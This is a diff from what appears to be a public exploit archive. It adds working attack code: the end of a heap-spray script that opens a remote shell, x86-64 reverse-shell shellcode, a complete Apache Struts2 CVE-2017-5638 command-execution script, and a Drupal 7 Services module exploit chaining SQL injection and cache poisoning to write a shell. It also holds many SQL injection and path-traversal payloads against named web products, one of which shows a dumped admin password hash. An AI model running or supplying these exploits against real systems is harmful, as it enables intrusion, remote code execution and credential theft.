+ data['heap'] = b'HTTP/1.1 200 OK\r\nLocation:HTTP://' + IP.encode()+ b':1337/A\r\n\r\n'
+ data['heap2']= data['heap']
+
+ sock = socket.socket(socket.AF_INET,socket.SOCK_DGRAM)
+ sock.sendto(data[state], sender)
+
+ if state == 'pwn':
+ print("[-] starting payload")
+ while True:
+ try:
+ print("[-] try to connect to shell")
+ telnet = telnetlib.Telnet()
+ telnet.open('192.168.1.1', 0x1337, timeout=1)
+ print('[+] connected')
+ telnet.write(b'uname -a; echo [+] pwned\n')
+ telnet.interact()
+ except:
+ pass
+ time.sleep(2.0)
+
+ if state == 'heap2':
+ print("[-] spraying heap 2/2")
+ mac()
+ state = 'pwn'
+
+ if state == 'heap':
+ print("[-] spraying heap 1/2")
+ mac()
+ state = 'heap2'
+
+ if state == 'clean':
+ print('[-] clearing database and crashing')
+ mac()
+ state = 'heap'
+---EOF---
\ No newline at end of file
diff --git a/platforms/linux/shellcode/41398.nasm b/platforms/lin_x86-64/shellcode/41398.nasm
similarity index 63%
rename from platforms/linux/shellcode/41398.nasm
rename to platforms/lin_x86-64/shellcode/41398.nasm
index 5e699caad..97a53a7f5 100755
--- a/platforms/linux/shellcode/41398.nasm
+++ b/platforms/lin_x86-64/shellcode/41398.nasm
@@ -20,29 +20,51 @@
;from, out of or in connection with the software or the use or other
;dealings in the Software.
;
-; For a detailed explanation of this shellcode see my blog post:
-; http://a41l4.blogspot.fr/2017/02/assignment-2b.html
-; 22 bytes, zero nulls
-global _start
+; For a detailed explanation of this shellcode see my blog post:
+; http://a41l4.blogspot.ca/2017/02/assignment-2b.html
+global _start
section .text
-
_start:
- ; zeros RAX, RDX and RSI with only 4 bytes of machine code
- xor esi,esi
- mul esi
-
- ; null terminator for the following string
- push rax
-
- ; push /bin//sh in reverse
- mov rbx,'/bin//sh'
+; Socket
+ push 41
+ pop rax
+ push 2
+ pop rdi
+ push 1
+ pop rsi
+ cdq
+ syscall
+; Connect
+ xchg edi, eax
+ mov rbx, 0xfeffff80a3eefffd ; not encoded 0x0100007f5c110002
+ not rbx
push rbx
+ mov al, 42
+ push rsp
+ pop rsi
+ mov dl, 16
+ syscall
+; Dup 2
+ push 3
+ pop rsi
+dup2loop:
+ mov al, 33
+ dec esi
+ syscall
+ loopnz dup2loop
+; Execve
+ ; rax and rsi are zero from the result of the last dup2 syscall and loop
+ push rax ; zero terminator for the following string that we are pushing
- ; store /bin//sh address in RDI, points at string
+ mov rbx, '/bin//sh'
+ push rbx
+
+ ; store /bin//sh address in RDI
push rsp
pop rdi
+
+ cdq ; zero rdx
- ; Call the Execve syscall
mov al, 59
- syscall
\ No newline at end of file
+ syscall
diff --git a/platforms/linux/webapps/41570.py b/platforms/linux/webapps/41570.py
new file mode 100755
index 000000000..61b7edfda
--- /dev/null
+++ b/platforms/linux/webapps/41570.py
@@ -0,0 +1,47 @@
+#!/usr/bin/python
+# -*- coding: utf-8 -*-
+
+import urllib2
+import httplib
+
+
+def exploit(url, cmd):
+ payload = "%{(#_='multipart/form-data')."
+ payload += "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)."
+ payload += "(#_memberAccess?"
+ payload += "(#_memberAccess=#dm):"
+ payload += "((#container=#context['com.opensymphony.xwork2.ActionContext.container'])."
+ payload += "(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))."
+ payload += "(#ognlUtil.getExcludedPackageNames().clear())."
+ payload += "(#ognlUtil.getExcludedClasses().clear())."
+ payload += "(#context.setMemberAccess(#dm))))."
+ payload += "(#cmd='%s')." % cmd
+ payload += "(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))."
+ payload += "(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))."
+ payload += "(#p=new java.lang.ProcessBuilder(#cmds))."
+ payload += "(#p.redirectErrorStream(true)).(#process=#p.start())."
+ payload += "(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()))."
+ payload += "(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))."
+ payload += "(#ros.flush())}"
+
+ try:
+ headers = {'User-Agent': 'Mozilla/5.0', 'Content-Type': payload}
+ request = urllib2.Request(url, headers=headers)
+ page = urllib2.urlopen(request).read()
+ except httplib.IncompleteRead, e:
+ page = e.partial
+
+ print(page)
+ return page
+
+
+if __name__ == '__main__':
+ import sys
+ if len(sys.argv) != 3:
+ print("[*] struts2_S2-045.py ")
+ else:
+ print('[*] CVE: 2017-5638 - Apache Struts2 S2-045')
+ url = sys.argv[1]
+ cmd = sys.argv[2]
+ print("[*] cmd: %s\n" % cmd)
+ exploit(url, cmd)
\ No newline at end of file
diff --git a/platforms/php/webapps/41556.txt b/platforms/php/webapps/41556.txt
new file mode 100755
index 000000000..b3e5bd0a5
--- /dev/null
+++ b/platforms/php/webapps/41556.txt
@@ -0,0 +1,20 @@
+# # # # #
+# Exploit Title: Country on Sale Script - SQL Injection
+# Google Dork: N/A
+# Date: 09.03.2017
+# Vendor Homepage: http://www.websitescripts.org/
+# Software: http://www.websitescripts.org/website-scripts/country-on-sale-script/prod_53.html
+# Demo: http://www.websitescripts.org/demo/countryonsalescript/
+# Version: N/A
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/read_more.php?newsid=[SQL]
+# http://localhost/[PATH]/countries/index.php?id=[SQL]
+# 13'+/*!50000union*/+select+1,version(),0x496873616e2053656e63616e3c62723e7777772e696873616e2e6e6574,4,5--+-
+# Etc..
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/41557.txt b/platforms/php/webapps/41557.txt
new file mode 100755
index 000000000..eb8540cab
--- /dev/null
+++ b/platforms/php/webapps/41557.txt
@@ -0,0 +1,18 @@
+# # # # #
+# Exploit Title: Media Search Engine Script - SQL Injection
+# Google Dork: N/A
+# Date: 09.03.2017
+# Vendor Homepage: http://www.websitescripts.org/
+# Software: http://www.websitescripts.org/website-scripts/media-search-engine-script/prod_51.html
+# Demo: http://www.websitescripts.org/demo/mediasearchengine/
+# Version: N/A
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/search.php?search=[SQL]
+# Etc..
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/41558.txt b/platforms/php/webapps/41558.txt
new file mode 100755
index 000000000..047156919
--- /dev/null
+++ b/platforms/php/webapps/41558.txt
@@ -0,0 +1,24 @@
+# # # # #
+# Exploit Title: Soundify - Audio Sharing Software v1.1 - SQL Injection
+# Google Dork: N/A
+# Date: 09.03.2017
+# Vendor Homepage: https://www.ncrypted.net/
+# Software: https://www.ncrypted.net/soundify
+# Demo: http://demo.ncryptedprojects.com/soundify/
+# Version: N/A
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/player?tid=[SQL]
+# tbl_admin :adminId
+# tbl_admin :firstName
+# tbl_admin :userName
+# tbl_admin :adminEmail
+# tbl_admin :passWord
+# tbl_admin :adminType
+# Etc..
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/41559.txt b/platforms/php/webapps/41559.txt
new file mode 100755
index 000000000..1a067bbe2
--- /dev/null
+++ b/platforms/php/webapps/41559.txt
@@ -0,0 +1,18 @@
+# # # # #
+# Exploit Title: BistroStays - Vacation Rental Software v3.0 - SQL Injection
+# Google Dork: N/A
+# Date: 09.03.2017
+# Vendor Homepage: https://www.ncrypted.net/
+# Software: https://www.ncrypted.net/bistrostays
+# Demo: http://demo.ncryptedprojects.com/bistrostays_v3/
+# Version: 3.0
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/search?guests=[SQL]
+# Etc..
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/41560.txt b/platforms/php/webapps/41560.txt
new file mode 100755
index 000000000..ea7737020
--- /dev/null
+++ b/platforms/php/webapps/41560.txt
@@ -0,0 +1,19 @@
+# # # # #
+# Exploit Title: Nlance - Freelance Marketplace Software v2.2 - SQL Injection
+# Google Dork: N/A
+# Date: 09.03.2017
+# Vendor Homepage: https://www.ncrypted.net/
+# Software: https://www.ncrypted.net/nlance
+# Demo: http://demo.ncryptedprojects.com/nlance-ent/
+# Version: 2.2
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/search/provider/?skill=[SQL]
+# -38'+/*!50000union*/+select+1,@@version--+-
+# Etc..
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/41561.txt b/platforms/php/webapps/41561.txt
new file mode 100755
index 000000000..296fa7941
--- /dev/null
+++ b/platforms/php/webapps/41561.txt
@@ -0,0 +1,25 @@
+# # # # #
+# Exploit Title: Busewe - Website Marketplace Software v1.2 - SQL Injection
+# Google Dork: N/A
+# Date: 09.03.2017
+# Vendor Homepage: https://www.ncrypted.net/
+# Software: https://www.ncrypted.net/busewe
+# Demo: http://demo.ncryptedprojects.com/busewe/
+# Version: 1.2
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/result?sort=desc&format=private&status=completed&age_min=[SQL]&age_max=[SQL]&revenue_min=[SQL]&revenue_max=[SQL]&profit_min=[SQL]&profit_max=[SQL]
+# admin :id
+# admin :username
+# admin :password
+# admin :masterPassword
+# admin :email
+# admin :role
+# admin :permissions
+# Etc..
+# # # # #
diff --git a/platforms/php/webapps/41562.txt b/platforms/php/webapps/41562.txt
new file mode 100755
index 000000000..8fb928d5e
--- /dev/null
+++ b/platforms/php/webapps/41562.txt
@@ -0,0 +1,18 @@
+# # # # #
+# Exploit Title: Fashmark - eCommerce Script v1.2 - SQL Injection
+# Google Dork: N/A
+# Date: 09.03.2017
+# Vendor Homepage: https://www.ncrypted.net/
+# Software: https://www.ncrypted.net/fashmark
+# Demo: http://demo.ncryptedprojects.com/fashmark-ent/
+# Version: 1.2
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/search/?searchChar=Ihsan_Sencan&category=[SQL]
+# Etc..
+# # # # #
diff --git a/platforms/php/webapps/41563.txt b/platforms/php/webapps/41563.txt
new file mode 100755
index 000000000..029d0d033
--- /dev/null
+++ b/platforms/php/webapps/41563.txt
@@ -0,0 +1,18 @@
+# # # # #
+# Exploit Title: TradeMart - B2B Trading Software v1.1 - SQL Injection
+# Google Dork: N/A
+# Date: 09.03.2017
+# Vendor Homepage: https://www.ncrypted.net/
+# Software: https://www.ncrypted.net/trademart
+# Demo: http://demo.ncryptedprojects.com/trademart/
+# Version: 1.1
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/Search?by=p&q=&user=[SQL]
+# Etc..
+# # # # #
diff --git a/platforms/php/webapps/41564.php b/platforms/php/webapps/41564.php
new file mode 100755
index 000000000..fb2dcfb19
--- /dev/null
+++ b/platforms/php/webapps/41564.php
@@ -0,0 +1,319 @@
+# Exploit Title: Drupal 7.x Services Module Remote Code Execution
+# Vendor Homepage: https://www.drupal.org/project/services
+# Exploit Author: Charles FOL
+# Contact: https://twitter.com/ambionics
+# Website: https://www.ambionics.io/blog/drupal-services-module-rce
+
+
+#!/usr/bin/php
+ 'dixuSOspsOUU.php',
+ 'data' => ''
+];
+
+$browser = new Browser($url . $endpoint_path);
+
+
+# Stage 1: SQL Injection
+
+class DatabaseCondition
+{
+ protected $conditions = [
+ "#conjunction" => "AND"
+ ];
+ protected $arguments = [];
+ protected $changed = false;
+ protected $queryPlaceholderIdentifier = null;
+ public $stringVersion = null;
+
+ public function __construct($stringVersion=null)
+ {
+ $this->stringVersion = $stringVersion;
+
+ if(!isset($stringVersion))
+ {
+ $this->changed = true;
+ $this->stringVersion = null;
+ }
+ }
+}
+
+class SelectQueryExtender {
+ # Contains a DatabaseCondition object instead of a SelectQueryInterface
+ # so that $query->compile() exists and (string) $query is controlled by
+us.
+ protected $query = null;
+
+ protected $uniqueIdentifier = QID;
+ protected $connection;
+ protected $placeholder = 0;
+
+ public function __construct($sql)
+ {
+ $this->query = new DatabaseCondition($sql);
+ }
+}
+
+$cache_id = "services:$endpoint:resources";
+$sql_cache = "SELECT data FROM {cache} WHERE cid='$cache_id'";
+$password_hash = '$S$D2NH.6IZNb1vbZEV1F0S9fqIz3A0Y1xueKznB8vWrMsnV/nrTpnd';
+
+# Take first user but with a custom password
+# Store the original password hash in signature_format, and endpoint cache
+# in signature
+$query =
+ "0x3a) UNION SELECT ux.uid AS uid, " .
+ "ux.name AS name, '$password_hash' AS pass, " .
+ "ux.mail AS mail, ux.theme AS theme, ($sql_cache) AS signature, " .
+ "ux.pass AS signature_format, ux.created AS created, " .
+ "ux.access AS access, ux.login AS login, ux.status AS status, " .
+ "ux.timezone AS timezone, ux.language AS language, ux.picture " .
+ "AS picture, ux.init AS init, ux.data AS data FROM {users} ux " .
+ "WHERE ux.uid<>(0"
+;
+
+$query = new SelectQueryExtender($query);
+$data = ['username' => $query, 'password' => 'ouvreboite'];
+$data = serialize($data);
+
+$json = $browser->post(TYPE_PHP, $data);
+
+# If this worked, the rest will as well
+if(!isset($json->user))
+{
+ print_r($json);
+ e("Failed to login with fake password");
+}
+
+# Store session and user data
+
+$session = [
+ 'session_name' => $json->session_name,
+ 'session_id' => $json->sessid,
+ 'token' => $json->token
+];
+store('session', $session);
+
+$user = $json->user;
+
+# Unserialize the cached value
+# Note: Drupal websites admins, this is your opportunity to fight back :)
+$cache = unserialize($user->signature);
+
+# Reassign fields
+$user->pass = $user->signature_format;
+unset($user->signature);
+unset($user->signature_format);
+
+store('user', $user);
+
+if($cache === false)
+{
+ e("Unable to obtains endpoint's cache value");
+}
+
+x("Cache contains " . sizeof($cache) . " entries");
+
+# Stage 2: Change endpoint's behaviour to write a shell
+
+class DrupalCacheArray
+{
+ # Cache ID
+ protected $cid = "services:endpoint_name:resources";
+ # Name of the table to fetch data from.
+ # Can also be used to SQL inject in DrupalDatabaseCache::getMultiple()
+ protected $bin = 'cache';
+ protected $keysToPersist = [];
+ protected $storage = [];
+
+ function __construct($storage, $endpoint, $controller, $action) {
+ $settings = [
+ 'services' => ['resource_api_version' => '1.0']
+ ];
+ $this->cid = "services:$endpoint:resources";
+
+ # If no endpoint is given, just reset the original values
+ if(isset($controller))
+ {
+ $storage[$controller]['actions'][$action] = [
+ 'help' => 'Writes data to a file',
+ # Callback function
+ 'callback' => 'file_put_contents',
+ # This one does not accept "true" as Drupal does,
+ # so we just go for a tautology
+ 'access callback' => 'is_string',
+ 'access arguments' => ['a string'],
+ # Arguments given through POST
+ 'args' => [
+ 0 => [
+ 'name' => 'filename',
+ 'type' => 'string',
+ 'description' => 'Path to the file',
+ 'source' => ['data' => 'filename'],
+ 'optional' => false,
+ ],
+ 1 => [
+ 'name' => 'data',
+ 'type' => 'string',
+ 'description' => 'The data to write',
+ 'source' => ['data' => 'data'],
+ 'optional' => false,
+ ],
+ ],
+ 'file' => [
+ 'type' => 'inc',
+ 'module' => 'services',
+ 'name' => 'resources/user_resource',
+ ],
+ 'endpoint' => $settings
+ ];
+ $storage[$controller]['endpoint']['actions'] += [
+ $action => [
+ 'enabled' => 1,
+ 'settings' => $settings
+ ]
+ ];
+ }
+
+ $this->storage = $storage;
+ $this->keysToPersist = array_fill_keys(array_keys($storage), true);
+ }
+}
+
+class ThemeRegistry Extends DrupalCacheArray {
+ protected $persistable;
+ protected $completeRegistry;
+}
+
+cache_poison($endpoint, $cache);
+
+# Write the file
+$json = (array) $browser->post(TYPE_JSON, json_encode($file));
+
+
+# Stage 3: Restore endpoint's behaviour
+
+cache_reset($endpoint, $cache);
+
+if(!(isset($json[0]) && $json[0] === strlen($file['data'])))
+{
+ e("Failed to write file.");
+}
+
+$file_url = $url . '/' . $file['filename'];
+x("File written: $file_url");
+
+
+# HTTP Browser
+
+class Browser
+{
+ private $url;
+ private $controller = CONTROLLER;
+ private $action = ACTION;
+
+ function __construct($url)
+ {
+ $this->url = $url;
+ }
+
+ function post($type, $data)
+ {
+ $headers = [
+ "Accept: " . TYPE_JSON,
+ "Content-Type: $type",
+ "Content-Length: " . strlen($data)
+ ];
+ $url = $this->url . '/' . $this->controller . '/' . $this->action;
+
+ $s = curl_init();
+ curl_setopt($s, CURLOPT_URL, $url);
+ curl_setopt($s, CURLOPT_HTTPHEADER, $headers);
+ curl_setopt($s, CURLOPT_POST, 1);
+ curl_setopt($s, CURLOPT_POSTFIELDS, $data);
+ curl_setopt($s, CURLOPT_RETURNTRANSFER, true);
+ curl_setopt($s, CURLOPT_SSL_VERIFYHOST, 0);
+ curl_setopt($s, CURLOPT_SSL_VERIFYPEER, 0);
+ $output = curl_exec($s);
+ $error = curl_error($s);
+ curl_close($s);
+
+ if($error)
+ {
+ e("cURL: $error");
+ }
+
+ return json_decode($output);
+ }
+}
+
+# Cache
+
+function cache_poison($endpoint, $cache)
+{
+ $tr = new ThemeRegistry($cache, $endpoint, CONTROLLER, ACTION);
+ cache_edit($tr);
+}
+
+function cache_reset($endpoint, $cache)
+{
+ $tr = new ThemeRegistry($cache, $endpoint, null, null);
+ cache_edit($tr);
+}
+
+function cache_edit($tr)
+{
+ global $browser;
+ $data = serialize([$tr]);
+ $json = $browser->post(TYPE_PHP, $data);
+}
+
+# Utils
+
+function x($message)
+{
+ print("$message\n");
+}
+
+function e($message)
+{
+ x($message);
+ exit(1);
+}
+
+function store($name, $data)
+{
+ $filename = "$name.json";
+ file_put_contents($filename, json_encode($data, JSON_PRETTY_PRINT));
+ x("Stored $name information in $filename");
+}
+
+
+
diff --git a/platforms/php/webapps/41566.txt b/platforms/php/webapps/41566.txt
new file mode 100755
index 000000000..8486fae68
--- /dev/null
+++ b/platforms/php/webapps/41566.txt
@@ -0,0 +1,18 @@
+# # # # #
+# Exploit Title: WordPress Plugin Mac Photo Gallery v3.0 - Arbitrary File Download
+# Google Dork: N/A
+# Date: 09.03.2017
+# Vendor Homepage: https://www.apptha.com/
+# Software: https://www.apptha.com/category/extension/Wordpress/Mac-Photo-Gallery
+# Demo: http://www.apptha.com/demo/mac-photo-gallery
+# Version: 3.0
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# Exploit :
+# http://localhost/[PLUGIN_PATH]/macdownload.php?albid=../../../wp-load.php
+# Etc..
+# # # # #
diff --git a/platforms/php/webapps/41567.txt b/platforms/php/webapps/41567.txt
new file mode 100755
index 000000000..f394add5a
--- /dev/null
+++ b/platforms/php/webapps/41567.txt
@@ -0,0 +1,21 @@
+# # # # #
+# Exploit Title: WordPress Plugin Apptha Slider Gallery v1.0 - SQL Injection
+# Google Dork: N/A
+# Date: 09.03.2017
+# Vendor Homepage: https://www.apptha.com/
+# Software: https://www.apptha.com/category/extension/Wordpress/apptha-slider-gallery
+# Demo: http://www.apptha.com/demo/apptha-slider-gallery
+# Version: 1.0
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/?albid=[SQL]
+# For example;
+# -3+/*!50000union*/+select+1,2,3,4,5,0x496873616e2053656e63616e20207777772e696873616e2e6e6574,concat(user_login,0x3a,user_pass),8,9,10,11,12,13,14+from+pleasant_users--+-&pid=6
+# admin:$P$BKL0XND.tfopqZH6S.QU.vhgjuVchx1
+# Etc..
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/41568.txt b/platforms/php/webapps/41568.txt
new file mode 100755
index 000000000..f3e99a258
--- /dev/null
+++ b/platforms/php/webapps/41568.txt
@@ -0,0 +1,18 @@
+# # # # #
+# Exploit Title: WordPress Plugin Apptha Slider Gallery v1.0 - Arbitrary File Download
+# Google Dork: N/A
+# Date: 09.03.2017
+# Vendor Homepage: https://www.apptha.com/
+# Software: https://www.apptha.com/category/extension/Wordpress/apptha-slider-gallery
+# Demo: http://www.apptha.com/demo/apptha-slider-gallery
+# Version: 1.0
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PLUGIN_PATH]/asgallDownload.php?imgname=../../../wp-load.php
+# Etc..
+# # # # #
diff --git a/platforms/php/webapps/41569.txt b/platforms/php/webapps/41569.txt
new file mode 100755
index 000000000..81b07daac
--- /dev/null
+++ b/platforms/php/webapps/41569.txt
@@ -0,0 +1,21 @@
+# # # # #
+# Exploit Title: WordPress Plugin PICA Photo Gallery v1.0 - SQL Injection
+# Google Dork: N/A
+# Date: 09.03.2017
+# Vendor Homepage: https://www.apptha.com/
+# Software: https://www.apptha.com/category/extension/Wordpress/PICA-Photo-Gallery
+# Demo: http://www.apptha.com/demo/pica-photo-gallery
+# Version: 1.0
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/?aid=[SQL]
+# For example;
+# -3+/*!50000union*/+select+0x496873616e2053656e63616e3c62723e7777772e696873616e2e6e6574,2,3,@@version--+-
+# wpapptha_term_relationships,wpapptha_term_taxonomy,wpapptha_terms,wpapptha_usermeta,wpapptha_users
+# Etc..
+# # # # #
diff --git a/platforms/xml/webapps/41574.html b/platforms/xml/webapps/41574.html
new file mode 100755
index 000000000..18877dcda
--- /dev/null
+++ b/platforms/xml/webapps/41574.html
@@ -0,0 +1,115 @@
+
+
+
+
+
+
+2) Persistent Denial Of Service uses call to WMIC
+
+
+
+
+
\ No newline at end of file